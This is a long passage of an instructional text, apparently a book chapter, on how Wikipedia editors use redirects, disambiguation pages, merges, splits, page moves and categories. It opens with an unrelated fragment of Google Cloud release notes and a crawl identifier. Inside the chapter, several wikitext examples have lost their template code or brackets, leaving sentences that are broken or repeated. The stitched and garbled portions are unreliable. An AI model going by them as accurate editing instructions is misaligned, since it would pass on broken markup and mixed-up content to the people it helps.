logs are now available in Security Command Center as part of Cloud Audit Logs. Learn more about Security Command Center audit logging.. August 21, 2020Cloud Composer - 20, 2020Anthos Anthos 1.4.2 is now available. Updated components: Anthos. Updated Java SDK to version 1.9.82. A new multi-region instance configuration is now available in North America - nam11 (Iowa/South Carolina). PyTorch/XLA 1.6 Release (GA) Highlights Cloud TPUs now support the PyTorch 1.6 release, via PyTorch/XLA integration. With this release we mark our general availability (GA) with the models such as ResNet, FairSeq Transformer and RoBERTa, and HuggingFace GLUE task models that have been rigorously tested and optimized. In addition, with our PyTorch/XLA 1.6 release, you no longer need to run the env-setup.py script on Colab/Kaggle as those are now compatible with native torch wheels. You can still continue to use that script if you would like to run with our latest unstable releases. New Features - XLA RNG state checkpointing/loading () - Device Memory XRT API () - [Kaggle/Colab] Small host VM memory environment utility () - [Advanced User] XLA Builder Support () - New op supported on PyTorch/XLA - Hardsigmoid () - true_divide () - max_unpool2d () - max_unpool3d () - Replication_pad1d () - Replication_pad2d () - Dynamic shape support on XLA:CPU and XLA:GPU (experimental) Bug Fixes - RNG Fix (proper dropout) - Manual all-reduce in backward pass () The Organization Policy for restricting protocol forwarding creation has launched into general availability. Invoice Parsing updates - Document AI now supports normalized values for certain entities returned from Invoice Parsing requests. - We have improved confidence scores for entities returned from Invoice Parsing requests. Istio 1.4.10-gke.5 Fixes an issue with protocol detection connection timeouts.
https://cloud.google.com/release-notes?hl=es
CC-MAIN-2020-40
refinedweb
2,936
50.43
0 Hi! First, I want to say that this is not any type of school assignment. I'm in the IT field and looking to work on learning C++. I've been following the book from: and I'm now trying things on my own. The program which the code below compiles will sometimes crash out at the beginning of its execution. I'm trying to put in any type of error catcher where the program will know that the program is about to crash, and it'll exit on its own behalf instead of crashing out by Windows Illegal Operation. I hope this makes sense. #include <iostream> #include <windows.h> using namespace std; int main() { //Initialize variables int n = 0; int z = 0; int *i,j[10]; double *f,g[10]; float *k,l[21]; int *p,m[1]; int x; // Associate pointers... i=j; f=g; k=l; p=m; // "Splash" Screen cout << "\nA just for fun program\n"; Sleep(1000); //Start the real work here for(x=1;x<350;x++) { cout << "\nAttempt #: " << x << '\n'; Sleep(10); n = (rand()%375)+11; cout << "Scanning to look cool: "; z = i[n]+x; cout << z; if (!z) { cout << "Trying to catch an error here...but I'm not working \nExiting\n"; break; } cout << i[n]+x<< ' ' << f+x << ' ' << k+x <<'\n'; } cout << "This looked cool..."; return 0; } I don't think "z" is my problem, but I just don't know enough to troubleshoot any further. Can anyone point me in the right direction? Thank you, -MT
https://www.daniweb.com/programming/software-development/threads/171438/simple-pointer-program-crashses
CC-MAIN-2017-09
refinedweb
257
81.02
Chapter 8: Building Wikipedia's WebEdit In Chapter 3, Finding Wikipedia's Content, we described many ways to browse Wikipedia. For instance, readers can explore Wikipedia via the links between pages or through categories of related articles. If an area of Wikipedia has been worked on for long enough, these browsing journeys go smoothly. But Wikipedia's content does not start out perfectly linked or classified, and new articles need to be integrated with existing content. Articles need care and attention to become fully usable in the context of the rest of the site. This chapter turns to web-building techniques on Wikipedia. You can add to, alter, and mend Wikipedia as a piece of hypertext. We'll cover six concepts for building navigational structures, linking articles, and maintaining article organization. These concepts have been mentioned in previous chapters, but here we'll present them as editorial tools. First, we'll cover redirecting one page title to another and building disambiguation pages, both of which help readers navigate, avoid duplication, and search the site more productively. We'll then focus on how articles are combined, split apart, or moved to better titles in order to comply with style guidelines and to make them more useful for the reader. In the next section, we'll discuss categories and categorization, which help readers navigate similar topics and editors maintain sets of pages. Finally, we'll review community processes for resolving problems that arise related to these topics. Redirect and DisambiguateEdit Redirects and disambiguation pages, first described in Chapter 1, What's in Wikipedia?, play important roles in internal Wikipedia connections. A redirect page directly points the reader from one page title to another and is used when more than one possible page title exists. Disambiguation pages clarify the use of a keyword by pointing to all of the articles that are referred to by that term or a similar term. 1.1. Redirects If you go to the article Norma Jeane Mortenson, you'll be automatically taken to the article called Marilyn Monroe instead. Although a reader doesn't see it, a page does exist under the title Norma Jeane Mortenson, but not a regular article page. Instead, this page is a special, very short page that only contains a pointer to another target page. This page is a redirect, Wikipedia's equivalent of an index entry reading for Norma Jeane Mortensen, see Marilyn Monroe. A redirect can be set from any page to any other page. Redirects are often used for name variants and common misspellings for people, places, or things. Although the article can only exist under one title, redirects automatically take the reader to the actual article from any conceivable title that he or she might search for. Redirects make it easier to find and search for content because they also show up in search results. Wikipedia has a tremendous number of redirects. As of mid-2007, the site had more redirect pages than article pages, by somewhere between 5 percent to 10 percent. Historical figures, with their varying names, titles, and multiple spellings, are a prolific source of redirects. Other significant sources are Romanizations of names and terms from other languages. For instance, English does not have a standard way for writing Arabic names: Mohammed, Mohammad, and Mohamed are all accepted ways of writing the Prophet's name. All of these possible spellings redirect to the actual article title (currently Muhammad), saving the reader the trouble of figuring out which spelling variation to use. As a small part of its mission, Wikipedia has to manage this huge system of redirects and disambiguations. Many reference works face this issue. For instance, an article in The Economist in 2007 talked about the problems confronting government intelligence agencies as they reconcile name variations: . [23] Wikipedians know how Mr. Scheuer feels. Names matter to reference works, but names are complex. Previous reference works and printed encyclopedias dealt with the problem by developing See references to guide readers from one term to another in an index; Wikipedia, which doesn't have a printed index, has an automatic—and much more comprehensive—solution instead. Redirects are also helpful when two pages with the same content are merged together, as described later in "Merging Articles" on Section 2.1, “Merging Articles”. When two pages are merged, the result is a composite article at one of the page titles and a redirect from the other one. 1.1.1. Creating and Editing Redirects You can easily create new redirects. First create a new article using the title you want to become a redirect, as described in Chapter 6, Good Writing and Research. Then type only this text on the page: - REDIRECT title of page to redirect to For instance, if you want to redirect the page Goldfishes to the article Goldfish (although article title convention uses the singular form of nouns, readers may search using the plural), you would create the page Goldfishes and type this text: - REDIRECT goldfish Then add an appropriate edit summary (rdr is common shorthand for redirect) and click Save. Now, if a reader tries to go to the page Goldfishes, he or she will instead end up at Goldfish. As a bonus, if a link to the page Goldfishes also appears somewhere in another article, when a reader clicks that link, he or she will be taken to Goldfish. You don't have to start an entirely new page to create a redirect. If the page Goldfishes already exists, you can turn it into a redirect by replacing any existing text with the redirect code and clicking Save. Be careful, though; if an article is already on the page, you may want to move it to a better title or merge it with an existing page, as described later in "Merge, Split, and Move" on Section 2.1, “Merging Articles”. If something goes wrong (or you change your mind), you can always edit a redirect. A redirect, like any other change you make to the site, can be reversed. But how? Suppose Erik Weisz is a redirect to Harry Houdini, following Wikipedia's practice of titling articles about performers using their most common stage name. If you follow a link to Erik Weisz, you'll be redirected to Harry Houdini; but don't get frustrated! When you are taken to an article from a redirect, you'll notice the title of the redirected page is displayed below the page title, showing you how you got there (Figure 8.1, “A redirect title below a page title—Harry Houdini, redirected from Erik Weisz”). Figure 8.1. A redirect title below a page title—Harry Houdini, redirected from Erik Weisz A redirect title below a page title—Harry Houdini, redirected from Erik Weisz Click the linked page title (Redirected from Erik Weisz) to access the redirect page itself (Figure 8.2, “A redirect page for Erik Weisz”). Figure 8.2. A redirect page for Erik Weisz A redirect page for Erik Weisz When you access an actual redirect page, you'll see a special URL, similar to. Adding ?redirect=no after the page title in the URL prevents the page from automatically redirecting. You can then edit this redirect page like any other page, either to change the redirect target or to remove the redirect and start an article instead. You can also check the page history for the redirect page to make sure quality content wasn't accidentally lost when the redirect was created. Here are some reasons for viewing and editing redirects: Create a full article at the page title to replace the redirect to another page. (This often happens when articles about similar or related items all redirect to one central page; specialty articles may eventually be written about each item.) Change the redirect to point to a different page (for instance, if the redirect was not quite right or had a typo). Revert the creation of the redirect if the page contained content before the redirect was created, so you can restore an earlier version (for instance, if the redirect was created accidentally or restoring the original article is important). Copy content from an earlier version of the article (before the redirect was created) onto some other page (you can find previous versions by browsing the redirect page's history). 1.1.2. Limitations on Redirecting Redirects are not always called for. For instance, you shouldn't create a redirect to an article that doesn't exist yet unless you plan to write that article immediately. Creating a redirect in this instance is detrimental: It creates a useless dead end, and it turns the redirect page title into a bluelink, whereas a redlink might attract the attention of an author who would want to write the article. For a similar reason, when articles are deleted, redirects to them should also be deleted. You should also be careful when creating redirects to sections in an article. For example, - REDIRECT Ice cream#vanilla is the text for a redirect page for Vanilla ice cream; it takes you to the Vanilla section of the page Ice cream. Section-specific redirects are useful, but they are not robust. This redirect could be broken easily by an editor retitling the section Vanilla flavor (Wikipedia has no way for you to discover What Links Here at the section level). For this reason, the Manual of Style recommends leaving a hidden comment, for instance, below the section heading when you redirect to it (see WP:MOS#Section management). One recurring theory is that you shouldn't pipe links to redirect titles. In other words, some Wikipedians think pilot of the first manned flight is worse than pilot of the first manned flight, given that Orville Wright redirects to Wright brothers. If the Wright brothers were given separate articles one day, however, the piped link to Orville would have been a better choice. As long as you don't create double redirects, you can create links to redirects. Some cases are discussed in depth at Wikipedia:Redirect. The point, generally, is to help readers rather than distract them. Finally, two technical issues limit redirect creation. Double redirects Avoid creating a redirect to a redirect: The database software is unable to forward twice. You can check for double redirects by clicking What Links Here; for instance, if you create a redirect by moving a page, check What Links Here for the old title. As the page mover, you're responsible for updating any redirects to point to the new title. Redirects across namespaces Redirecting from one namespace to another is confusing because the whole point of namespaces is to separate different types of content. With a few exceptions, redirects should stay within one namespace. If a list page is replaced by a category, a redirect from the list page (in the main article namespace) to the category (in the Category namespace) could be created. Users may redirect their user pages to their user talk pages (from the User namespace to the User_talk namespace). A Wikipedia: namespace help page may be redirected to an existing help page in the Help namespace. Articles in the main namespace should not redirect to other namespaces, however. For more, see Wikipedia:Cross-namespace redirects (shortcut WP:CNR). 1.2. Disambiguation Pages Disambiguation pages, colloquially known as dab pages, are one of the Wikipedia success stories. Their assigned role is humble enough. Many phrases or single English words are ambiguous because they have multiple meanings. Take, for example, the word bridge. Besides being a structure that allows you to cross over a river or other obstacle, bridge can be a card game, a piece of dental work, or the command post of a ship. With all these meanings, wikilinks to the article Bridge could often lead readers to the wrong article. The solution is to create several differently titled articles for each meaning of the ambiguous term along with a dedicated page to link to, or disambiguate, between all of them for readers. Note Wikipedia coined the term disambiguation early on in its history because the site needed a word for pages that served this function. If only two or three articles may be confused, a lightweight form of disambiguation are hatnotes (see Chapter 4, Understanding and Evaluating an Article), which point back and forth between two or three articles. For terms with more meanings, a dedicated disambiguation page works better. In this case, the disambiguation page is located at Bridge (disambiguation), which lists the possible articles that may be related to the term bridge. As of January 2008, this page included links to the following articles: Bridge (dentistry), a fixed prosthesis used to replace missing teeth Bridge (ship), the area from which a ship is commanded Contract bridge, the modern card game; see Bridge (card game disambiguation) for other card games that bridge may refer to Bridge (music), an interlude that connects two parts of a song Bridge (structure), a structure built so that a transportation route can cross an obstacle But what article is on the page simply titled Bridge? In this case, Bridge (structure) redirects to the article Bridge; on Wikipedia, the default meaning of bridge is the structure. A hatnote on this default page points readers to the disambiguation page if they're looking for articles using a different meaning of the term. (Figure 8.3, “The hatnote on the Bridge article, pointing to the related disambiguation page” shows the hatnote that appears on the Bridge article.) Figure 8.3. The hatnote on the Bridge article, pointing to the related disambiguation page The hatnote on the Bridge article, pointing to the related disambiguation page Disambiguation pages can be created in more than one way, however. If no clear default meaning for a term exists, the main article may serve as the disambiguation page. For instance, if you go to Subway, you'll find that it is a disambiguation page leading to articles using these meanings for subway (among others): Subway (rail), underground railway, also known as a metro, underground, U-Bahn Subway (underpass), an underground walkway, usually a tunnel Descriptions on a disambiguation page do not need to be extensive. They do not serve as summaries of the articles they link to; they simply point to different possible meanings of a term and need only clarify the distinction between those meanings. Keep descriptions succinct: American film actor for an actor is probably sufficient; you don't need to include the films he has acted in. For pages that disambiguate between several people, include their profession, nationality, and birth and death dates (providing dates is especially important for an article on someone like George Williams, as half a dozen American politicians have that name). 1.2.1. Disambiguating Articles About People Wikipedia has hundreds of thousands of biographies (approximately 20 percent of all articles). Because of this, special guidelines have been set up for disambiguating names. Wikipedia handles this complex area in a way that may initially appear unclear if you're creating or updating these types of pages. Note the templates used on pages and don't underestimate the issues involved with biographies. Tidier Hatnotes Hatnotes are small text messages at the top of an article. They are useful when only two articles might get confused and for directing readers to disambiguation pages. Wikipedia uses standard templates for hatnotes such as Template:For, Template:Otheruses, and Template:Distinguish. These templates add standardized messages to a page, which can be easier than writing out your own message (also perfectly acceptable). See Wikipedia:Hatnote (shortcut WP:HAT) for hatnote templates and common messages. The term hatnote is specific to Wikipedia and was created to avoid ambiguity because a headnote (the opposite of a footnote) is used in legal work. Many complete proper names require disambiguation: John Smith, Thomas Adams, and Juan González are all examples of common names that need disambiguation pages to distinguish between individuals sharing that name. But Wikipedia also lists articles by surname alone. For example, Category:Irish surnames contains around 200 pages, each devoted to a single surname of Irish origin. If you go to Nolan, you'll find an extensive list of articles on Irish, British, American, Canadian, and other Nolans. Thus, a surname page is very much like a disambiguation page: Nolan refers to numerous people. Sometimes these surname pages include (surname) in the title. For instance, Cooper is a basic disambiguation page, listing the many places called Cooper, a handful of well-known people named Cooper, and a pointer to the page Cooper (profession), which is about the profession of making barrels. Because Cooper is a very common English surname, Wikipedia also has a separate page Cooper (surname), listing articles about people with that name. This page exists in place of List of people with surname Cooper. Two other kinds of pages about people exist: listings by given names and family history. Given names are treated differently than surnames. If you search for John (first name), you'll find this page in Category:Given names. Listing every article about a person with the first name John would not be useful. Instead you'll discover that Juan is the Spanish equivalent—in other words, the article is about the name itself. The basic page John is a disambiguation page that lists historical figures known just as John, such as the English King who signed the Magna Carta. Use the Template:Given name template to classify these pages. These topics are extremely popular on the Web. We mentioned in Chapter 1, What's in Wikipedia? that Wikipedia believes that most family history is indiscriminate and only includes it when the family's history meets the standards of notability—and only in articles about specific families (not the general surname), such as Bancroft family, the owners of The Wall Street Journal until 2007. Family articles should be placed in Category:Families and its subcategories. That Bancroft article belongs in the categories Category:American families and Category:Business families. 1.2.2. Disambiguation Templates Like other articles, disambiguation pages are tagged with templates that identify them as disambiguation pages and sort them into different categories. Here's how it all breaks down by template: {{disambig}} is the general disambiguation template. For example, [[Tom Thumb (disambiguation)]] lists articles about the folklore character, a railway locomotive, a feature film with Peter Sellers, a grocer in Dallas, Texas, and some Marvel Comics superheroes. In other words, miscellaneous lists are straightforward disambiguation pages. {{hndis}} is the template for human names. This template applies, for example, to [[Bill Gates (disambiguation)]], which lists not only Bill Gates of Microsoft but also "Swiftwater" Bill Gates, who took part in the Klondike gold rush, and various people more commonly known by the name William Gates. {{surname}} is the surname page template. The Manual of Style (shortcut WP:MOSDAB, subsection Given names or surnames) describes how a surname page differs from a disambiguation page. {{geodis}} is the template for pages that disambiguate the names of places. Further Reading Redirects The style guideline for creating redirects Help page on how to create redirects Disambiguation Pages The guideline for creating disambiguation pages, with page naming conventions of Style (disambiguation pages) The Manual of Style page with formatting guidelines for disambiguation pages WikiProject Disambiguation, for cleaning up disambiguation pages The hatnotes guideline [23] See "What's in a Name?" The Economist, accessed March 8, 2007 (). Merge, Split, and MoveEdit Working with and cleaning up individual articles includes determining if each article covers an appropriate scope and does not duplicate other articles. If two articles are very similar, you may need to merge them. On the other hand, if an article grows too long and unwieldy (or covers several topics), you may need to split it into more than one article. And if an article should appear under a more appropriate title, you need to move it. Moves and merges both create redirects from former page titles and copy content and revision history to a new page title. 2.1. Merging Articles Wikipedia has no special process for ensuring that new articles don't duplicate old ones (this is why, in Chapter 6, Good Writing and Research, we suggest checking for other articles on the same topic before starting a new one). Editors who write new articles are responsible for making sure no duplicate articles (perhaps using a slightly different title) exist. If an editor doesn't check, however, and creates a duplicate article, other editors may eventually catch the duplication. In this case, they will most likely flag the two articles as candidates for a merge. The goal of a merge is to end up with one good, coherent article that incorporates all facts, concepts, and references from both articles without duplicating material. The ideal merge results in a better article. No content should be lost in a merge; instead, all of the relevant facts should end up in one article, and the other, alternate title redirects readers to the new combined article. Another, more complex case is when several small articles need to be consolidated into one more satisfactory and broader article. For instance, an article about a band member may be merged into the article about the band if little independent information about the musician in question is available. Sometimes a noun and antonym, or two similar terms, make more sense in a single article (e.g., Supralapsarianism and Infralapsarianism). These cases generally require more discussion and may be controversial. A good merge is an unhurried, multipass procedure requiring many edits. Because merges require skill, a single editor often performs the merge once all the interested editors have agreed to it. This can vary from article to article; for articles where one title is misspelled or when the two articles are nearly identical, objections are unlikely. (William M. Ramsey and William Mitchell Ramsay is an example of this kind of duplication, where two articles were accidentally created about the same person.) Problems may arise, however, if you want to combine two similar concepts and another editor wants to maintain a distinction between the concepts. For instance, in mathematics, fractions and rational numbers are covered in separate articles—Fraction (mathematics) and Rational number—even though fractions are, in fact, rational numbers. 2.1.1. How to Merge Articles Merging is a manual process that can be quite involved for longer articles. Assuming you want to perform the merge yourself, here are the steps to follow: Identify the articles you want to merge. Make sure they are, in fact, duplicate articles or otherwise need to be combined. Tag each of the articles to be merged with a special merge template. Insert the template at the beginning of the article: where otherarticlename is the title of the article that you want to merge with the article you're currently tagging, and the current month and year appears after date=. Tag the other article to be merged, replacing otherarticlename with the title of the first article. These templates alert readers and editors to the possible merge. (Figure 8.4, “The merge message template on the Bulgarian Education article, suggesting a merge to the article called Education in Bulgaria” shows this message at the top of the Bulgarian Education article.) Figure 8.4. The merge message template on the Bulgarian Education article, suggesting a merge to the article called Education in Bulgaria The merge message template on the Bulgarian Education article, suggesting a merge to the article called Education in Bulgaria In any merge, one article will become the destination article (mergeto page), where all the content will be combined, and the other will become the redirected article (mergefrom page), which will become a redirect to the other article. If you already know which article should be which, you can use more specific templates: on the redirected article on the destination article The merge templates will place the articles into Category:Articles to be merged; adding the date means they will be sorted into a month-by-month category as well. Add a note to each article's talk page, describing why you think the articles should be merged if the reason is not apparent. After tagging the articles, wait a week (perhaps longer for obscure articles) for editors who have watchlisted the articles to comment on the merge. The idea is to leave sufficient time in case anyone disagrees with the merge. (If you get impatient in the meantime, you can find plenty of other merging work to do on older articles!) Review any comments left regarding the merge; if strong objections have been raised, don't merge the articles. If you have not yet decided, choose the destination article and the redirected article. If you aren't sure, discuss it with other editors on the relevant talk pages to resolve the matter. Edit both articles at once (use two browser windows or two browser tabs). First, copy the text from the mergefrom page to the mergeto page. Make sure to include all references, footnotes, external links, and see alsos (as for editing, you can draft the merged article first and save it later, or you can use subsequent edits to clean up your work). Add an appropriate edit summary when you save the article indicating where the content came from, such as "merging content," and include the title of the article you're merging from. Use several edits to work on the logical order of the new, combined page. Determine the extent of duplication, which sections need to be cut or moved, and if any new sections need to be started. Reducing the duplication in stages is best; sort the material by combining duplicate sections. It is best to determine duplication section by section rather than when you first combine the articles. Polish the text of the new article and work on readability. Try not to delete content, but focus on creating a quality article. Don't lose references and footnotes, and cite any questionable statements. Replace the text on the mergefrom article with a redirect to the new destination (mergeto) article. Save the page, indicating which pages are being merged in the edit summaries. If the two articles disagreed about a fact, include this information in a note on the talk page of the destination article. Also indicate any other changes, such as text cuts or deleted images. Check What Links Here from the redirected article to find double redirects that may have been created by the merge; fix these redirects by editing them to point to the destination article. When you're finished, remove the merge tag from the destination article, and add a note indicating that the merge is complete to your original threads on the talk pages. Congratulate yourself on completing the merge! For major consolidations with more than one article, you can use the Template:Multiplemergefrom template. Proceed with the merge one article at a time; you will still need to determine a destination article. 2.2. Splitting Articles An article should be split into multiple articles when it has become unwieldy to read and edit. An article should also split into multiple articles if it deals with several diverse topics better suited to individual articles. An article should not be split, however, if the resulting articles would be small stubs. For example, an article about an author should not be split into small articles about each of his or her books; in this case, one long article about the author and his or her work with redirects from the book titles is usually best. Very long articles are undesirable for a variety of reasons: They are difficult to navigate and read, and in some older browsers and mobile browsers, you can't edit pages with more than 32KB of text. Long articles can also take a long time to load on slow Internet connections. The Manual of Style deals with these points at Wikipedia:Article size (shortcut WP:SIZE). When a long article includes too much detail on a narrow subtopic, you might want to split it. Splitting is an important aspect of Wikipedia:Summary style, which was mentioned in Chapter 6, Good Writing and Research. Long articles should generally follow summary style. Each section of the article should summarize the major topic points with links to specialized articles that fill in detail. For example, an article about a sports team should not be dominated by material on a famous coach: The coach should be discussed in a separate article and the material sensibly divided between the team's article (which would cover the coach's work with the team) and the coach's article (which would cover mostly biographical information). Procedurally, a split is similar to a merge. First, post the template on the page, perhaps at the beginning of the section you propose splitting into its own article. Add a note to the article's talk page before doing anything drastic. You should normally wait for any comments and discussion among editors. If a section of text needs to be split into its own article: Give the new article an appropriate title. Edit the old article to obtain the wikitext for cutting and pasting, so any formatting is preserved. Add an appropriate edit summary, indicating that you're splitting the old article and giving the names of the two articles using wikilinks, for instance, Split History of Alaska out from Alaska. Add a summary to the old article where you cut the text rather than leaving a gap, and add a wikilink to the new article. Using the History of Alaska example, in the main Alaska article just add one or two short paragraphs summarizing the high points of Alaskan history. At the top of the section called ==History of Alaska==, include a link to the new, more specialized article, along with a message such as Main article: History of Alaska. This message tells readers to click the link to go to that article if they want more information on Alaskan history. Use the template - to produce a neat message.to produce a neat message. 2.3. Moving Pages If an article is located at the wrong title, you can move it to a new title as long as another article isn't already located at that title. Moving is the only way to rename a page. Moving a page is simple but has several implications. To move a page, you must be logged in and have an account that is more than four days old (as of early 2008). Click the Move tab at the top of the page you want to rename. In the form that appears, type the new title that you want the article to have and the reason you are moving the article to the new title. Keep the Move associated talk page box checked. Check the Watch this page box to add it to your personal watchlist. A typical move may be as minor as moving PT Barnum to P. T. Barnum, (adding periods and a space between the initials). Page moves are routinely used to fix title style (correcting punctuation, including the type of apostrophe, or using a hyphen for an en dash are common fixes). Page moves accomplish three important things: Change the article title Move the page history to the new page title Create a redirect from the old title to the new title They may also result in three other things: Turn redirects to the old title into double redirects Fill in redlinks, if the new title has been linked to on other pages Prevent future duplication Creating double redirects is negative, but the other two are positive. If, for example, you move an orphan article with a poorly chosen title to a more reasonable title, you may be rewarded with a stack of new backlinks to the page if others have already linked to that new page title elsewhere. Broken links have suddenly become bluelinks thanks to your observant work. 2.3.1. Limits on Moving Pages If you're trying to move an article and another article already has the title you've chosen, you won't be able to move your article there. Examine both articles: Should they be merged instead? See "When a Page Move Is Blocked" on Section 4, “Housekeeping” for what to do in that more complicated scenario. The only time you can move an article on top of an existing page is when that page is a redirect with minimal history. The move function is the only acceptable way to retitle an article, as moving transfers the version history along with the article itself. Although you can easily copy and paste article content into a new page and then redirect the old page to the new one, doing so is wrong. This results in an article with no history of previous versions, creating a confusing record. These so-called cut-and-paste moves can be fixed by an administrator through the history merge process; see Wikipedia:How to fix cut and paste moves. When merging or splitting an article, always provide a good edit summary detailing where the content came from. Fixing Double Redirects After you move an article, you're responsible for removing double redirects by checking What Links Here for the old article. After you've moved an article successfully, a message reminds you to check for double redirects and gives you the correct text to use. A good editor will not neglect this task, even though bots on the site may get to it within a few days. 2.3.2. Undoing a Move Page moves can be undone. Immediately after moving an article, you will have the option to revert back if you realize you've made a mistake. Undoing is possible only if the article from which the original move was made has not subsequently been edited. If it has, you can reverse the move function by going back to the original title. If that is not possible, you will need an administrator's help. See Wikipedia:How to rename (move) a page#Undoing a move. 2.3.3. Contentious Title Changes After you've worked on Wikipedia for a while, you'll get a feel for what is considered contentious and what is not. For article titles, the basic rule is to use the most common expression. Titles should not be changed to make a point—political or otherwise. Obviously, if the new title fails to describe the article's text in a neutral way, problems may arise. In case of doubt, discuss the new title on the article's talk page before moving the article. For example, consider what type of article might justify including the word massacre in its title: Frequent discussions about this type of issue have occurred, and nationalist opinions become involved. For example, the use of the word massacre has been contentious in relation to Deir Yassin massacre, which some have wanted renamed Battle of Deir Yassin. In this instance, Wikipedia engages with contentious history, and sharp debates cannot be avoided. Wikipedia prefers to be correct rather than populist regarding some exceptions to using the common name or title, such as articles about aristocrats. But take, for example, the article J. D. Salinger. Moving it to Jerome David Salinger would cause annoyance because J.D. Salinger is never referred to by his full name. Although full names are often better than initials, in this instance, they aren't; Salinger's initials serve as a sort of pen name. (More examples of this can be found at List of people known by initials.) Further Reading Merging Articles Help merging and moving pages Articles to be merged, sorted by the month they were tagged Splitting Articles The section of the Manual of Style that deals with splitting articles The category of articles that need to be split About article size Moving Pages How to move a page CategorizeEdit Each page in the Category namespace represents, lists, and perhaps defines a category, or grouping of related pages. Categories place pages on related topics in one "container." A category page on Wikipedia should offer an overview of the coverage of a particular subject. How extensive is the coverage? How are articles organized? Is the particular topic you want there, but under a title that wouldn't be your first choice? Is there a subcategory that's a better fit for the area you want to research? You learned how to navigate with categories in "Browsing by Categories" on Section 3.4, “Browsing by Categories”; in this section, you'll learn how to use them as an editorial tool. All articles should be in at least one category; most articles are in more than one category. Some areas are particularly important to categorize: For instance, work is ongoing to track all Wikipedia's biographies of living persons in Wikipedia:Living people, with the number of articles running well into the six figures. When an article is in one or more categories, this information appears at the very bottom of the article in an automatically generated section called Categories. You Can Change Your Skin Different skins—the formatting for how the site looks, which can be changed in your preferences (see Chapter 11, Becoming a Wikipedian)—display categories in different locations. If you refer constantly to categories on articles, changing your skin to classic, which displays categories at the top rather than at the bottom of the page, will save you from having to scroll down to use them. Go to My Preferences in the upper right-hand corner of the page if you're logged in. To change back, go to Preferences at the top right in the classic skin and select Monobook (the default skin). Clicking any category link will take you to the main page for that category. As described in Chapter 3, Finding Wikipedia's Content (see Figure 3.10, “Example of a category page (the category of Fictional Countries), showing editable sections” on Section 3.4.1, “Structure of a Category Page”), a category page has four parts: The explanation of the category; this text (along with the category's discussion page) is editable and is what you'll see if you click Edit This Page. A list of any subcategories within the category; these are listed alphabetically, but if the category is very large, the list may be spread over several pages. A list of links to articles in the category; this list is automatically populated. If the category is very large, the listing may be spread over several pages; only the first 200 links will appear on the first page. Click Next 200 at the bottom of the page to see the next page of entries. At the very bottom, you'll find a list of the categories that the category you're viewing is part of. These are editable by editing the category page. Lists vs. Categories The debate over whether categories or lists should be used to sort articles continues on Wikipedia. Because categories are automated, they are somewhat inflexible, compared to lists that are created as editable articles. The ability to edit means lists can be annotated and referenced, which is the main reason lists persist on the site. Categorizing BasicsEdit You can assign a page to any category simply by adding Category:categoryname to the page's wikitext. Substitute the actual name of the category in place of categoryname. For example, to add the article Bozo the Clown to the Clowns category, you would edit the article and add the text Category:Clowns at the very bottom of the page. Placing an article in a category by adding a category tag does two things: It automatically lists the article on the appropriate category page. It also provides a link to that category page in the list of categories at the bottom of the article. Though no connection exists between the location of the category tag in the article source text and where the Categories box appears on the page, the general convention is to place categories together at the end of the source text (though before any interwiki links), one per line, so they don't affect the rest of the text and are all in one place. (Figure 8.5, “Article wikitext with multiple categories listed near the end of a page (after templates and before interwiki links), from the article Exploding whale” shows the placement of categories in an article's wikitext.) Wikipedia has no standard order for categories. Figure 8.5. Article wikitext with multiple categories listed near the end of a page (after templates and before interwiki links), from the article Exploding whale Article wikitext with multiple categories listed near the end of a page (after templates and before interwiki links), from the article Exploding whale Articles can be included in more than one category by adding multiple category tags. For example, for a person no longer alive, the standard categories are year of birth, year of death, and occupation. Most articles are naturally in more than one category. Most Categories The page in the greatest number of categories can be found at the special page Special:Mostcategories. As of March 2008, a large number of Fauna categories were added to Red Fox, giving it 96; second as we go to print is Black Rat. Prior to this, the article in the greatest number of categories was Winston Churchill, with 67; these include Category:Knights of the Elephant, for holders of a Danish decoration, and CategoryNobel laureates in Literature]], from 1953, as well as Category:Old Harrovians and Category:Members of the Queen's Privy Council for Canada. To link to a category in wikitext without categorizing the page, type Category:Instruction Doing this is useful for See also sections in articles. This is also vital if you want to discuss a category on a talk page. If you leave out the first colon, the text of the link won't be displayed, and the page will be categorized in that category. Categories and Content PolicyEdit Like everything else on Wikipedia, categories are not canonical. Sometimes they are even incorrect or misleading, usually as the result of an honest mistake. Articles should be placed in categories simply to inform, never to make a point or forward a controversial position. Obviously, if an article about a person is in a category damaging to his or her reputation, the classification should be fully supported within the article. No one should just add Category:Murderers, unjustified, to a biography. Wikipedia doesn't allow its category system to be used as a way of commenting on content. In general, anybody adding categories to an article should follow the same basic policies of Verifiability, No Original Research, and Neutral Point of View that govern the rest of Wikipedia. Categories are part of the informational content of an article and should be treated appropriately: They should be supported by references (or more properly by statements in the article's text that are themselves referenced), especially if the category is contentious. (One disadvantage of categories as opposed to lists: You can add sources to a list to support inclusion, but you can't annotate an article's categories directly.) Wikipedia has many guidelines for categorizing articles; Wikipedia:Categorization FAQ is one place to find them. Wikipedia:Categorization of people, another guideline, explains the sensitive subject of placing people in categories that might affect their reputation. Especially for biographical articles about living people, use caution when adding categories other than very formal and descriptive ones. Creating New CategoriesEdit You can start a new category easily. If you add a category to an article, but the category doesn't exist yet, it displays as a redlink in the article's list of categories. To turn the redlink blue, simply click it (or visit Category:New category name, where new category name is the category you want to create) and add some content, such as a brief description of the category and the categories it is a subcategory of, to the category page. Any pages that you or others have already tagged with your new category name will automatically be listed on the new category page. For example, Category:Poisoned apples could be created by adding this text to the new page Category:Poisoned apples: A poisoned apple is an apple that has been poisoned. Category:Apples Category:Fairytale objects The description will appear at the top of the category page, and adding the categories will instantly make poisoned apples a new subcategory of the Apples and Fairytale Objects category. All new categories should have their broader categories listed, but including a description is optional; in this case, the description isn't very helpful. In some cases, though, a good description (perhaps linking to the main article on the subject) will help the average reader, especially for obscure subjects. Wikipedia also has naming and structural conventions for creating categories. Use plurals, for example Category:Pigs, for categories. This convention differs from the article title convention of generally preferring the singular form. Proper names such as Category:Vermont, which collects articles about the state, or collective headings such as Category:Greek mythology are also common category names. Before creating a new category, make sure the category you want doesn't already exist under a variant name (check articles similar to the one you're trying to categorize). Creating categories that are not obviously needed is considered a nuisance. 3.4. Subcategories Categories can have subcategories. Anyone can create or alter subcategories by simply categorizing the category page. For instance, you could make Category:Piglets a subcategory of Category:Pigs; simply tag the Category:Piglets page with CategoryPigs]]. Using the subcategory and supercategory structure is a good way to browse the site and is discussed extensively in Chapter 3, Finding Wikipedia's Content. Here, we'll discuss the issues around classifying articles using detailed categories. Are detailed subsubcategories a good thing or not? Certainly having categories that contain too many articles can be unwieldy; a category with more than 200 articles in it requires multiple pages. Subcategorizing the articles into more distinct categories can help keep categories 